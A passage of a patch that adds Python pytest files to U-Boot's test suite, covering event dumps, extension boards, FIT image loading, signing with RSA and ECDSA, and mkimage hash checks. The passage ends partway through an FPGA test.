check_script('''ubifs_boot= + env exists bootubipart || + env set bootubipart UBI; + env exists bootubivol || + env set bootubivol boot; + if ubi part ${bootubipart} && + ubifsmount ubi${devnum}:${bootubivol}; + then + devtype=ubi; + run scan_dev_for_boot; + fi +''', + 'ubifs_boot=env exists bootubipart || env set bootubipart UBI; ' + 'env exists bootubivol || env set bootubivol boot; ' + 'if ubi part ${bootubipart} && ubifsmount ubi${devnum}:${bootubivol}; ' + 'then devtype=ubi; run scan_dev_for_boot; fi\\0') diff --git a/test/py/tests/test_event_dump.py b/test/py/tests/test_event_dump.py new file mode 100644 index 00000000000..e282c67335c --- /dev/null +++ b/test/py/tests/test_event_dump.py @@ -0,0 +1,24 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright 2021 Google LLC +# Written by Simon Glass <sjg@chromium.org> + +import pytest +import re +import u_boot_utils as util + +# This is only a partial test - coverting 64-bit sandbox. It does not test +# big-endian images, nor 32-bit images +@pytest.mark.boardspec('sandbox') +def test_event_dump(u_boot_console): + """Test that the "help" command can be executed.""" + cons = u_boot_console + sandbox = cons.config.build_dir + '/u-boot' + out = util.run_and_log(cons, ['scripts/event_dump.py', sandbox]) + expect = '''.*Event type Id Source location +-------------------- ------------------------------ ------------------------------ +EVT_FT_FIXUP bootmeth_vbe_ft_fixup .*boot/vbe_request.c:.* +EVT_FT_FIXUP bootmeth_vbe_simple_ft_fixup .*boot/vbe_simple_os.c:.* +EVT_LAST_STAGE_INIT install_smbios_table .*lib/efi_loader/efi_smbios.c:.* +EVT_MISC_INIT_F sandbox_early_getopt_check .*arch/sandbox/cpu/start.c:.* +EVT_TEST h_adder_simple .*test/common/event.c:''' + assert re.match(expect, out, re.MULTILINE) is not None diff --git a/test/py/tests/test_extension.py b/test/py/tests/test_extension.py new file mode 100644 index 00000000000..267cf2ff27c --- /dev/null +++ b/test/py/tests/test_extension.py @@ -0,0 +1,53 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2020 +# Author: Kory Maincent <kory.maincent@bootlin.com> + +# Test U-Boot's "extension" commands. + +import os +import pytest +import u_boot_utils + +overlay_addr = 0x1000 + +SANDBOX_DTB='arch/sandbox/dts/sandbox.dtb' +OVERLAY_DIR='arch/sandbox/dts/' + +def load_dtb(u_boot_console): + u_boot_console.log.action('Loading devicetree to RAM...') + u_boot_console.run_command('host load hostfs - $fdt_addr_r %s' % (os.path.join(u_boot_console.config.build_dir, SANDBOX_DTB))) + u_boot_console.run_command('fdt addr $fdt_addr_r') + +@pytest.mark.buildconfigspec('cmd_fdt') +@pytest.mark.boardspec('sandbox') +def test_extension(u_boot_console): + """Test the 'extension' command.""" + + load_dtb(u_boot_console) + + output = u_boot_console.run_command('extension list') + assert('No extension' in output) + + output = u_boot_console.run_command('extension scan') + assert output == 'Found 2 extension board(s).' + + output = u_boot_console.run_command('extension list') + assert('overlay0.dtbo' in output) + assert('overlay1.dtbo' in output) + + u_boot_console.run_command_list([ + 'setenv extension_overlay_addr %s' % (overlay_addr), + 'setenv extension_overlay_cmd \'host load hostfs - ${extension_overlay_addr} %s${extension_overlay_name}\'' % (os.path.join(u_boot_console.config.build_dir, OVERLAY_DIR))]) + + output = u_boot_console.run_command('extension apply 0') + assert('bytes read' in output) + + output = u_boot_console.run_command('fdt print') + assert('button3' in output) + + output = u_boot_console.run_command('extension apply all') + assert('bytes read' in output) + + output = u_boot_console.run_command('fdt print') + assert('button4' in output) + diff --git a/test/py/tests/test_fit.py b/test/py/tests/test_fit.py new file mode 100755 index 00000000000..8f9c4b26411 --- /dev/null +++ b/test/py/tests/test_fit.py @@ -0,0 +1,410 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2013, Google Inc. +# +# Sanity check of the FIT handling in U-Boot + +import os +import pytest +import struct +import u_boot_utils as util +import fit_util + +# Define a base ITS which we can adjust using % and a dictionary +base_its = ''' +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel-1 { + data = /incbin/("%(kernel)s"); + type = "kernel"; + arch = "sandbox"; + os = "linux"; + compression = "%(compression)s"; + load = <0x40000>; + entry = <0x8>; + }; + kernel-2 { + data = /incbin/("%(loadables1)s"); + type = "kernel"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + %(loadables1_load)s + entry = <0x0>; + }; + fdt-1 { + description = "snow"; + data = /incbin/("%(fdt)s"); + type = "flat_dt"; + arch = "sandbox"; + %(fdt_load)s + compression = "%(compression)s"; + signature-1 { + algo = "sha1,rsa2048"; + key-name-hint = "dev"; + }; + }; + ramdisk-1 { + description = "snow"; + data = /incbin/("%(ramdisk)s"); + type = "ramdisk"; + arch = "sandbox"; + os = "linux"; + %(ramdisk_load)s + compression = "%(compression)s"; + }; + ramdisk-2 { + description = "snow"; + data = /incbin/("%(loadables2)s"); + type = "ramdisk"; + arch = "sandbox"; + os = "linux"; + %(loadables2_load)s + compression = "none"; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel-1"; + fdt = "fdt-1"; + %(ramdisk_config)s + %(loadables_config)s + }; + }; +}; +''' + +# Define a base FDT - currently we don't use anything in this +base_fdt = ''' +/dts-v1/; + +/ { + #address-cells = <1>; + #size-cells = <0>; + + model = "Sandbox Verified Boot Test"; + compatible = "sandbox"; + + binman { + }; + + reset@0 { + compatible = "sandbox,reset"; + reg = <0>; + }; +}; +''' + +# This is the U-Boot script that is run for each test. First load the FIT, +# then run the 'bootm' command, then save out memory from the places where +# we expect 'bootm' to write things. Then quit. +base_script = ''' +host load hostfs 0 %(fit_addr)x %(fit)s +fdt addr %(fit_addr)x +bootm start %(fit_addr)x +bootm loados +host save hostfs 0 %(kernel_addr)x %(kernel_out)s %(kernel_size)x +host save hostfs 0 %(fdt_addr)x %(fdt_out)s %(fdt_size)x +host save hostfs 0 %(ramdisk_addr)x %(ramdisk_out)s %(ramdisk_size)x +host save hostfs 0 %(loadables1_addr)x %(loadables1_out)s %(loadables1_size)x +host save hostfs 0 %(loadables2_addr)x %(loadables2_out)s %(loadables2_size)x +''' + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('fit_signature') +@pytest.mark.requiredtool('dtc') +def test_fit(u_boot_console): + def make_fname(leaf): + """Make a temporary filename + + Args: + leaf: Leaf name of file to create (within temporary directory) + Return: + Temporary filename + """ + return os.path.join(cons.config.build_dir, leaf) + + def filesize(fname): + """Get the size of a file + + Args: + fname: Filename to check + Return: + Size of file in bytes + """ + return os.stat(fname).st_size + + def read_file(fname): + """Read the contents of a file + + Args: + fname: Filename to read + Returns: + Contents of file as a string + """ + with open(fname, 'rb') as fd: + return fd.read() + + def make_ramdisk(filename, text): + """Make a sample ramdisk with test data + + Returns: + Filename of ramdisk created + """ + fname = make_fname(filename) + data = '' + for i in range(100): + data += '%s %d was seldom used in the middle ages\n' % (text, i) + with open(fname, 'w') as fd: + print(data, file=fd) + return fname + + def make_compressed(filename): + util.run_and_log(cons, ['gzip', '-f', '-k', filename]) + return filename + '.gz' + + def find_matching(text, match): + """Find a match in a line of text, and return the unmatched line portion + + This is used to extract a part of a line from some text. The match string + is used to locate the line - we use the first line that contains that + match text. + + Once we find a match, we discard the match string itself from the line, + and return what remains. + + TODO: If this function becomes more generally useful, we could change it + to use regex and return groups. + + Args: + text: Text to check (list of strings, one for each command issued) + match: String to search for + Return: + String containing unmatched portion of line + Exceptions: + ValueError: If match is not found + + >>> find_matching(['first line:10', 'second_line:20'], 'first line:') + '10' + >>> find_matching(['first line:10', 'second_line:20'], 'second line') + Traceback (most recent call last): + ... + ValueError: Test aborted + >>> find_matching('first line:10\', 'second_line:20'], 'second_line:') + '20' + >>> find_matching('first line:10\', 'second_line:20\nthird_line:30'], + 'third_line:') + '30' + """ + __tracebackhide__ = True + for line in '\n'.join(text).splitlines(): + pos = line.find(match) + if pos != -1: + return line[:pos] + line[pos + len(match):] + + pytest.fail("Expected '%s' but not found in output") + + def check_equal(expected_fname, actual_fname, failure_msg): + """Check that a file matches its expected contents + + This is always used on out-buffers whose size is decided by the test + script anyway, which in some cases may be larger than what we're + actually looking for. So it's safe to truncate it to the size of the + expected data. + + Args: + expected_fname: Filename containing expected contents + actual_fname: Filename containing actual contents + failure_msg: Message to print on failure + """ + expected_data = read_file(expected_fname) + actual_data = read_file(actual_fname) + if len(expected_data) < len(actual_data): + actual_data = actual_data[:len(expected_data)] + assert expected_data == actual_data, failure_msg + + def check_not_equal(expected_fname, actual_fname, failure_msg): + """Check that a file does not match its expected contents + + Args: + expected_fname: Filename containing expected contents + actual_fname: Filename containing actual contents + failure_msg: Message to print on failure + """ + expected_data = read_file(expected_fname) + actual_data = read_file(actual_fname) + assert expected_data != actual_data, failure_msg + + def run_fit_test(mkimage): + """Basic sanity check of FIT loading in U-Boot + + TODO: Almost everything: + - hash algorithms - invalid hash/contents should be detected + - signature algorithms - invalid sig/contents should be detected + - compression + - checking that errors are detected like: + - image overwriting + - missing images + - invalid configurations + - incorrect os/arch/type fields + - empty data + - images too large/small + - invalid FDT (e.g. putting a random binary in instead) + - default configuration selection + - bootm command line parameters should have desired effect + - run code coverage to make sure we are testing all the code + """ + # Set up invariant files + control_dtb = fit_util.make_dtb(cons, base_fdt, 'u-boot') + kernel = fit_util.make_kernel(cons, 'test-kernel.bin', 'kernel') + ramdisk = make_ramdisk('test-ramdisk.bin', 'ramdisk') + loadables1 = fit_util.make_kernel(cons, 'test-loadables1.bin', 'lenrek') + loadables2 = make_ramdisk('test-loadables2.bin', 'ksidmar') + kernel_out = make_fname('kernel-out.bin') + fdt = make_fname('u-boot.dtb') + fdt_out = make_fname('fdt-out.dtb') + ramdisk_out = make_fname('ramdisk-out.bin') + loadables1_out = make_fname('loadables1-out.bin') + loadables2_out = make_fname('loadables2-out.bin') + + # Set up basic parameters with default values + params = { + 'fit_addr' : 0x1000, + + 'kernel' : kernel, + 'kernel_out' : kernel_out, + 'kernel_addr' : 0x40000, + 'kernel_size' : filesize(kernel), + + 'fdt' : fdt, + 'fdt_out' : fdt_out, + 'fdt_addr' : 0x80000, + 'fdt_size' : filesize(control_dtb), + 'fdt_load' : '', + + 'ramdisk' : ramdisk, + 'ramdisk_out' : ramdisk_out, + 'ramdisk_addr' : 0xc0000, + 'ramdisk_size' : filesize(ramdisk), + 'ramdisk_load' : '', + 'ramdisk_config' : '', + + 'loadables1' : loadables1, + 'loadables1_out' : loadables1_out, + 'loadables1_addr' : 0x100000, + 'loadables1_size' : filesize(loadables1), + 'loadables1_load' : '', + + 'loadables2' : loadables2, + 'loadables2_out' : loadables2_out, + 'loadables2_addr' : 0x140000, + 'loadables2_size' : filesize(loadables2), + 'loadables2_load' : '', + + 'loadables_config' : '', + 'compression' : 'none', + } + + # Make a basic FIT and a script to load it + fit = fit_util.make_fit(cons, mkimage, base_its, params) + params['fit'] = fit + cmd = base_script % params + + # First check that we can load a kernel + # We could perhaps reduce duplication with some loss of readability + cons.config.dtb = control_dtb + cons.restart_uboot() + with cons.log.section('Kernel load'): + output = cons.run_command_list(cmd.splitlines()) + check_equal(kernel, kernel_out, 'Kernel not loaded') + check_not_equal(control_dtb, fdt_out, + 'FDT loaded but should be ignored') + check_not_equal(ramdisk, ramdisk_out, + 'Ramdisk loaded but should not be') + + # Find out the offset in the FIT where U-Boot has found the FDT + line = find_matching(output, 'Booting using the fdt blob at ') + fit_offset = int(line, 16) - params['fit_addr'] + fdt_magic = struct.pack('>L', 0xd00dfeed) + data = read_file(fit) + + # Now find where it actually is in the FIT (skip the first word) + real_fit_offset = data.find(fdt_magic, 4) + assert fit_offset == real_fit_offset, ( + 'U-Boot loaded FDT from offset %#x, FDT is actually at %#x' % + (fit_offset, real_fit_offset)) + + # Check if bootargs strings substitution works + output = cons.run_command_list([ + 'env set bootargs \\\"\'my_boot_var=${foo}\'\\\"', + 'env set foo bar', + 'bootm prep', + 'env print bootargs']) + assert 'bootargs="my_boot_var=bar"' in output, "Bootargs strings not substituted" + + # Now a kernel and an FDT + with cons.log.section('Kernel + FDT load'): + params['fdt_load'] = 'load = <%#x>;' % params['fdt_addr'] + fit = fit_util.make_fit(cons, mkimage, base_its, params) + cons.restart_uboot() + output = cons.run_command_list(cmd.splitlines()) + check_equal(kernel, kernel_out, 'Kernel not loaded') + check_equal(control_dtb, fdt_out, 'FDT not loaded') + check_not_equal(ramdisk, ramdisk_out, + 'Ramdisk loaded but should not be') + + # Try a ramdisk + with cons.log.section('Kernel + FDT + Ramdisk load'): + params['ramdisk_config'] = 'ramdisk = "ramdisk-1";' + params['ramdisk_load'] = 'load = <%#x>;' % params['ramdisk_addr'] + fit = fit_util.make_fit(cons, mkimage, base_its, params) + cons.restart_uboot() + output = cons.run_command_list(cmd.splitlines()) + check_equal(ramdisk, ramdisk_out, 'Ramdisk not loaded') + + # Configuration with some Loadables + with cons.log.section('Kernel + FDT + Ramdisk load + Loadables'): + params['loadables_config'] = 'loadables = "kernel-2", "ramdisk-2";' + params['loadables1_load'] = ('load = <%#x>;' % + params['loadables1_addr']) + params['loadables2_load'] = ('load = <%#x>;' % + params['loadables2_addr']) + fit = fit_util.make_fit(cons, mkimage, base_its, params) + cons.restart_uboot() + output = cons.run_command_list(cmd.splitlines()) + check_equal(loadables1, loadables1_out, + 'Loadables1 (kernel) not loaded') + check_equal(loadables2, loadables2_out, + 'Loadables2 (ramdisk) not loaded') + + # Kernel, FDT and Ramdisk all compressed + with cons.log.section('(Kernel + FDT + Ramdisk) compressed'): + params['compression'] = 'gzip' + params['kernel'] = make_compressed(kernel) + params['fdt'] = make_compressed(fdt) + params['ramdisk'] = make_compressed(ramdisk) + fit = fit_util.make_fit(cons, mkimage, base_its, params) + cons.restart_uboot() + output = cons.run_command_list(cmd.splitlines()) + check_equal(kernel, kernel_out, 'Kernel not loaded') + check_equal(control_dtb, fdt_out, 'FDT not loaded') + check_not_equal(ramdisk, ramdisk_out, 'Ramdisk got decompressed?') + check_equal(ramdisk + '.gz', ramdisk_out, 'Ramdist not loaded') + + + cons = u_boot_console + # We need to use our own device tree file. Remember to restore it + # afterwards. + old_dtb = cons.config.dtb + try: + mkimage = cons.config.build_dir + '/tools/mkimage' + run_fit_test(mkimage) + finally: + # Go back to the original U-Boot with the correct dtb. + cons.config.dtb = old_dtb + cons.restart_uboot() diff --git a/test/py/tests/test_fit_auto_signed.py b/test/py/tests/test_fit_auto_signed.py new file mode 100644 index 00000000000..9ea3351619f --- /dev/null +++ b/test/py/tests/test_fit_auto_signed.py @@ -0,0 +1,195 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2022 Massimo Pegorer + +""" +Test that mkimage generates auto-FIT with signatures and/or hashes as expected. + +The mkimage tool can create auto generated (i.e. without an ITS file +provided as input) FIT in three different flavours: with crc32 checksums +of 'images' subnodes; with signatures of 'images' subnodes; with sha1 +hashes of 'images' subnodes and signatures of 'configurations' subnodes. +This test verifies that auto-FIT are generated as expected, in all of +the three flavours, including check of hashes and signatures (except for +configurations ones). + +The test does not run the sandbox. It only checks the host tool mkimage. +""" + +import os +import pytest +import u_boot_utils as util +import binascii +from Cryptodome.Hash import SHA1 +from Cryptodome.Hash import SHA256 +from Cryptodome.PublicKey import RSA +from Cryptodome.Signature import pkcs1_15 + +class SignedFitHelper(object): + """Helper to manipulate a FIT with signed/hashed images/configs.""" + def __init__(self, cons, file_name): + self.fit = file_name + self.cons = cons + self.images_nodes = set() + self.confgs_nodes = set() + + def __fdt_list(self, path): + return util.run_and_log(self.cons, + f'fdtget -l {self.fit} {path}') + + def __fdt_get_string(self, node, prop): + return util.run_and_log(self.cons, + f'fdtget -ts {self.fit} {node} {prop}') + + def __fdt_get_binary(self, node, prop): + numbers = util.run_and_log(self.cons, + f'fdtget -tbi {self.fit} {node} {prop}') + + bignum = bytearray() + for little_num in numbers.split(): + bignum.append(int(little_num)) + + return bignum + + def build_nodes_sets(self): + """Fill sets with FIT images and configurations subnodes.""" + for node in self.__fdt_list('/images').split(): + subnode = f'/images/{node}' + self.images_nodes.add(subnode) + + for node in self.__fdt_list('/configurations').split(): + subnode = f'/configurations/{node}' + self.confgs_nodes.add(subnode) + + return len(self.images_nodes) + len(self.confgs_nodes) + + def check_fit_crc32_images(self): + """Test that all images in the set are hashed as expected. + + Each image must have an hash with algo=crc32 and hash value must match + the one calculated over image data. + """ + for node in self.images_nodes: + algo = self.__fdt_get_string(f'{node}/hash', 'algo') + assert algo == "crc32\n", "Missing expected crc32 image hash!" + + raw_crc32 = self.__fdt_get_binary(f'{node}/hash', 'value') + raw_bin = self.__fdt_get_binary(node, 'data') + assert raw_crc32 == (binascii.crc32(raw_bin) & + 0xffffffff).to_bytes(4, 'big'), "Wrong crc32 hash!" + + def check_fit_signed_images(self, key_name, sign_algo, verifier): + """Test that all images in the set are signed as expected. + + Each image must have a signature with: key-name-hint matching key_name + argument; algo matching sign_algo argument; value matching the one + calculated over image data using verifier argument. + """ + for node in self.images_nodes: + hint = self.__fdt_get_string(f'{node}/signature', 'key-name-hint') + assert hint == key_name + "\n", "Missing expected key name hint!" + algo = self.__fdt_get_string(f'{node}/signature', 'algo') + assert algo == sign_algo + "\n", "Missing expected signature algo!" + + raw_sig = self.__fdt_get_binary(f'{node}/signature', 'value') + raw_bin = self.__fdt_get_binary(node, 'data') + verifier.verify(SHA256.new(raw_bin), bytes(raw_sig)) + + def check_fit_signed_confgs(self, key_name, sign_algo): + """Test that all configs are signed, and images hashed, as expected. + + Each image must have an hash with algo=sha1 and hash value must match + the one calculated over image data. Each configuration must have a + signature with key-name-hint matching key_name argument and algo + matching sign_algo argument. + TODO: configurations signature checking. + """ + for node in self.images_nodes: + algo = self.__fdt_get_string(f'{node}/hash', 'algo') + assert algo == "sha1\n", "Missing expected sha1 image hash!" + + raw_hash = self.__fdt_get_binary(f'{node}/hash', 'value') + raw_bin = self.__fdt_get_binary(node, 'data') + assert raw_hash == SHA1.new(raw_bin).digest(), "Wrong sha1 hash!" + + for node in self.confgs_nodes: + hint = self.__fdt_get_string(f'{node}/signature', 'key-name-hint') + assert hint == key_name + "\n", "Missing expected key name hint!" + algo = self.__fdt_get_string(f'{node}/signature', 'algo') + assert algo == sign_algo + "\n", "Missing expected signature algo!" + + +@pytest.mark.buildconfigspec('fit_signature') +@pytest.mark.requiredtool('fdtget') +def test_fit_auto_signed(u_boot_console): + """Test that mkimage generates auto-FIT with signatures/hashes as expected. + + The mkimage tool can create auto generated (i.e. without an ITS file + provided as input) FIT in three different flavours: with crc32 checksums + of 'images' subnodes; with signatures of 'images' subnodes; with sha1 + hashes of 'images' subnodes and signatures of 'configurations' subnodes. + This test verifies that auto-FIT are generated as expected, in all of + the three flavours, including check of hashes and signatures (except for + configurations ones). + + The test does not run the sandbox. It only checks the host tool mkimage. + """ + cons = u_boot_console + mkimage = cons.config.build_dir + '/tools/mkimage' + tempdir = os.path.join(cons.config.result_dir, 'auto_fit') + os.makedirs(tempdir, exist_ok=True) + kernel_file = f'{tempdir}/vmlinuz' + dt1_file = f'{tempdir}/dt-1.dtb' + dt2_file = f'{tempdir}/dt-2.dtb' + key_name = 'sign-key' + sign_algo = 'sha256,rsa4096' + key_file = f'{tempdir}/{key_name}.key' + fit_file = f'{tempdir}/test.fit' + + # Create a fake kernel image and two dtb files with random data + with open(kernel_file, 'wb') as fd: + fd.write(os.urandom(512)) + + with open(dt1_file, 'wb') as fd: + fd.write(os.urandom(256)) + + with open(dt2_file, 'wb') as fd: + fd.write(os.urandom(256)) + + # Create 4096 RSA key and write to file to be read by mkimage + key = RSA.generate(bits=4096) + verifier = pkcs1_15.new(key) + + with open(key_file, 'w') as fd: + fd.write(str(key.export_key(format='PEM').decode('ascii'))) + + b_args = " -d" + kernel_file + " -b" + dt1_file + " -b" + dt2_file + s_args = " -k" + tempdir + " -g" + key_name + " -o" + sign_algo + + # 1 - Create auto FIT with images crc32 checksum, and verify it + util.run_and_log(cons, mkimage + ' -fauto' + b_args + " " + fit_file) + + fit = SignedFitHelper(cons, fit_file) + if fit.build_nodes_sets() == 0: + raise ValueError('FIT-1 has no "/image" nor "/configuration" nodes') + + fit.check_fit_crc32_images() + + # 2 - Create auto FIT with signed images, and verify it + util.run_and_log(cons, mkimage + ' -fauto' + b_args + s_args + " " + + fit_file) + + fit = SignedFitHelper(cons, fit_file) + if fit.build_nodes_sets() == 0: + raise ValueError('FIT-2 has no "/image" nor "/configuration" nodes') + + fit.check_fit_signed_images(key_name, sign_algo, verifier) + + # 3 - Create auto FIT with signed configs and hashed images, and verify it + util.run_and_log(cons, mkimage + ' -fauto-conf' + b_args + s_args + " " + + fit_file) + + fit = SignedFitHelper(cons, fit_file) + if fit.build_nodes_sets() == 0: + raise ValueError('FIT-3 has no "/image" nor "/configuration" nodes') + + fit.check_fit_signed_confgs(key_name, sign_algo) diff --git a/test/py/tests/test_fit_ecdsa.py b/test/py/tests/test_fit_ecdsa.py new file mode 100644 index 00000000000..cc6c0c4dc42 --- /dev/null +++ b/test/py/tests/test_fit_ecdsa.py @@ -0,0 +1,113 @@ +# SPDX-License-Identifier: GPL-2.0+ +# +# Copyright (c) 2020,2021 Alexandru Gagniuc <mr.nuke.me@gmail.com> + +""" +Test ECDSA signing of FIT images + +This test uses mkimage to sign an existing FIT image with an ECDSA key. The +signature is then extracted, and verified against pyCryptodome. +This test doesn't run the sandbox. It only checks the host tool 'mkimage' +""" + +import os +import pytest +import u_boot_utils as util +from Cryptodome.Hash import SHA256 +from Cryptodome.PublicKey import ECC +from Cryptodome.Signature import DSS + +class SignableFitImage(object): + """ Helper to manipulate a FIT image on disk """ + def __init__(self, cons, file_name): + self.fit = file_name + self.cons = cons + self.signable_nodes = set() + + def __fdt_list(self, path): + return util.run_and_log(self.cons, f'fdtget -l {self.fit} {path}') + + def __fdt_set(self, node, **prop_value): + for prop, value in prop_value.items(): + util.run_and_log(self.cons, f'fdtput -ts {self.fit} {node} {prop} {value}') + + def __fdt_get_binary(self, node, prop): + numbers = util.run_and_log(self.cons, f'fdtget -tbi {self.fit} {node} {prop}') + + bignum = bytearray() + for little_num in numbers.split(): + bignum.append(int(little_num)) + + return bignum + + def find_signable_image_nodes(self): + for node in self.__fdt_list('/images').split(): + image = f'/images/{node}' + if 'signature' in self.__fdt_list(image): + self.signable_nodes.add(image) + + return self.signable_nodes + + def change_signature_algo_to_ecdsa(self): + for image in self.signable_nodes: + self.__fdt_set(f'{image}/signature', algo='sha256,ecdsa256') + + def sign(self, mkimage, key_file): + util.run_and_log(self.cons, [mkimage, '-F', self.fit, f'-G{key_file}']) + + def check_signatures(self, key): + for image in self.signable_nodes: + raw_sig = self.__fdt_get_binary(f'{image}/signature', 'value') + raw_bin = self.__fdt_get_binary(image, 'data') + + sha = SHA256.new(raw_bin) + verifier = DSS.new(key, 'fips-186-3') + verifier.verify(sha, bytes(raw_sig)) + + +@pytest.mark.buildconfigspec('fit_signature') +@pytest.mark.requiredtool('dtc') +@pytest.mark.requiredtool('fdtget') +@pytest.mark.requiredtool('fdtput') +def test_fit_ecdsa(u_boot_console): + """ Test that signatures generated by mkimage are legible. """ + def generate_ecdsa_key(): + return ECC.generate(curve='prime256v1') + + def assemble_fit_image(dest_fit, its, destdir): + dtc_args = f'-I dts -O dtb -i {destdir}' + util.run_and_log(cons, [mkimage, '-D', dtc_args, '-f', its, dest_fit]) + + def dtc(dts): + dtb = dts.replace('.dts', '.dtb') + util.run_and_log(cons, f'dtc {datadir}/{dts} -O dtb -o {tempdir}/{dtb}') + + cons = u_boot_console + mkimage = cons.config.build_dir + '/tools/mkimage' + datadir = cons.config.source_dir + '/test/py/tests/vboot/' + tempdir = os.path.join(cons.config.result_dir, 'ecdsa') + os.makedirs(tempdir, exist_ok=True) + key_file = f'{tempdir}/ecdsa-test-key.pem' + fit_file = f'{tempdir}/test.fit' + dtc('sandbox-kernel.dts') + + key = generate_ecdsa_key() + + # Create a fake kernel image -- zeroes will do just fine + with open(f'{tempdir}/test-kernel.bin', 'w') as fd: + fd.write(500 * chr(0)) + + # invocations of mkimage expect to read the key from disk + with open(key_file, 'w') as f: + f.write(key.export_key(format='PEM')) + + assemble_fit_image(fit_file, f'{datadir}/sign-images-sha256.its', tempdir) + + fit = SignableFitImage(cons, fit_file) + nodes = fit.find_signable_image_nodes() + if len(nodes) == 0: + raise ValueError('FIT image has no "/image" nodes with "signature"') + + fit.change_signature_algo_to_ecdsa() + fit.sign(mkimage, key_file) + fit.check_signatures(key) diff --git a/test/py/tests/test_fit_hashes.py b/test/py/tests/test_fit_hashes.py new file mode 100644 index 00000000000..4891e77ca2d --- /dev/null +++ b/test/py/tests/test_fit_hashes.py @@ -0,0 +1,114 @@ +# SPDX-License-Identifier: GPL-2.0+ +# +# Copyright (c) 2021 Alexandru Gagniuc <mr.nuke.me@gmail.com> + +""" +Check hashes produced by mkimage against known values + +This test checks the correctness of mkimage's hashes. by comparing the mkimage +output of a fixed data block with known good hashes. +This test doesn't run the sandbox. It only checks the host tool 'mkimage' +""" + +import os +import pytest +import u_boot_utils as util + +kernel_hashes = { + "sha512" : "f18c1486a2c29f56360301576cdfce4dfd8e8e932d0ed8e239a1f314b8ae1d77b2a58cd7fe32e4075e69448e623ce53b0b6aa6ce5626d2c189a5beae29a68d93", + "sha384" : "16e28976740048485d08d793d8bf043ebc7826baf2bc15feac72825ad67530ceb3d09e0deb6932c62a5a0e9f3936baf4", + "sha256" : "2955c56bc1e5050c111ba6e089e0f5342bb47dedf77d87e3f429095feb98a7e5", + "sha1" : "652383e1a6d946953e1f65092c9435f6452c2ab7", + "md5" : "4879e5086e4c76128e525b5fe2af55f1", + "crc32" : "32eddfdf", + "crc16-ccitt" : "d4be" +} + +class ReadonlyFitImage(object): + """ Helper to manipulate a FIT image on disk """ + def __init__(self, cons, file_name): + self.fit = file_name + self.cons = cons + self.hashable_nodes = set() + + def __fdt_list(self, path): + return util.run_and_log(self.cons, f'fdtget -l {self.fit} {path}') + + def __fdt_get(self, node, prop): + val = util.run_and_log(self.cons, f'fdtget {self.fit} {node} {prop}') + return val.rstrip('\n') + + def __fdt_get_sexadecimal(self, node, prop): + numbers = util.run_and_log(self.cons, f'fdtget -tbx {self.fit} {node} {prop}') + + sexadecimal = '' + for num in numbers.rstrip('\n').split(' '): + sexadecimal += num.zfill(2) + return sexadecimal + + def find_hashable_image_nodes(self): + for node in self.__fdt_list('/images').split(): + # We only have known hashes for the kernel node + if 'kernel' not in node: + continue + self.hashable_nodes.add(f'/images/{node}') + + return self.hashable_nodes + + def verify_hashes(self): + for image in self.hashable_nodes: + algos = set() + for node in self.__fdt_list(image).split(): + if "hash-" not in node: + continue + + raw_hash = self.__fdt_get_sexadecimal(f'{image}/{node}', 'value') + algo = self.__fdt_get(f'{image}/{node}', 'algo') + algos.add(algo) + + good_hash = kernel_hashes[algo] + if good_hash != raw_hash: + raise ValueError(f'{image} Borked hash: {algo}'); + + # Did we test all the hashes we set out to test? + missing_algos = kernel_hashes.keys() - algos + if (missing_algos): + raise ValueError(f'Missing hashes from FIT: {missing_algos}') + + +@pytest.mark.buildconfigspec('hash') +@pytest.mark.requiredtool('dtc') +@pytest.mark.requiredtool('fdtget') +@pytest.mark.requiredtool('fdtput') +def test_mkimage_hashes(u_boot_console): + """ Test that hashes generated by mkimage are correct. """ + + def assemble_fit_image(dest_fit, its, destdir): + dtc_args = f'-I dts -O dtb -i {destdir}' + util.run_and_log(cons, [mkimage, '-D', dtc_args, '-f', its, dest_fit]) + + def dtc(dts): + dtb = dts.replace('.dts', '.dtb') + util.run_and_log(cons, f'dtc {datadir}/{dts} -O dtb -o {tempdir}/{dtb}') + + cons = u_boot_console + mkimage = cons.config.build_dir + '/tools/mkimage' + datadir = cons.config.source_dir + '/test/py/tests/vboot/' + tempdir = os.path.join(cons.config.result_dir, 'hashes') + os.makedirs(tempdir, exist_ok=True) + + fit_file = f'{tempdir}/test.fit' + dtc('sandbox-kernel.dts') + + # Create a fake kernel image -- Avoid zeroes or crc16 will be zero + with open(f'{tempdir}/test-kernel.bin', 'w') as fd: + fd.write(500 * chr(0xa5)) + + assemble_fit_image(fit_file, f'{datadir}/hash-images.its', tempdir) + + fit = ReadonlyFitImage(cons, fit_file) + nodes = fit.find_hashable_image_nodes() + if len(nodes) == 0: + raise ValueError('FIT image has no "/image" nodes with "hash-..."') + + fit.verify_hashes() diff --git a/test/py/tests/test_fpga.py b/test/py/tests/test_fpga.py new file mode 100644 index 00000000000..ca7ef8ea40d --- /dev/null +++ b/test/py/tests/test_fpga.py @@ -0,0 +1,565 @@ +# SPDX-License-Identifier: GPL-2.0 +# +# Copyright (c) 2018, Xilinx Inc. +# +# Michal Simek +# Siva Durga Prasad Paladugu + +import pytest +import re +import random +import u_boot_utils + +""" +Note: This test relies on boardenv_* containing configuration values to define +the network available and files to be used for testing. Without this, this test +will be automatically skipped. + +For example: + +# True if a DHCP server is attached to the network, and should be tested. +env__net_dhcp_server = True + +# A list of environment variables that should be set in order to configure a +# static IP. In this test case we atleast need serverip for performing tftpb +# to get required files. +env__net_static_env_vars = [ + ('ipaddr', '10.0.0.100'), + ('netmask', '255.255.255.0'), + ('serverip', '10.0.0.1'), +] + +# Details regarding the files that may be read from a TFTP server. . +env__fpga_secure_readable_file = { + 'fn': 'auth_bhdr_ppk1_bit.bin', + 'enckupfn': 'auth_bhdr_enc_kup_load_bit.bin', + 'addr': 0x1000000, + 'keyaddr': 0x100000, + 'keyfn': 'key.txt', +} + +env__fpga_under_test = { + 'dev': 0, + 'addr' : 0x1000000, + 'bitstream_load': 'compress.bin', + 'bitstream_load_size': 1831960, + 'bitstream_loadp': 'compress_pr.bin', + 'bitstream_loadp_size': 423352, + 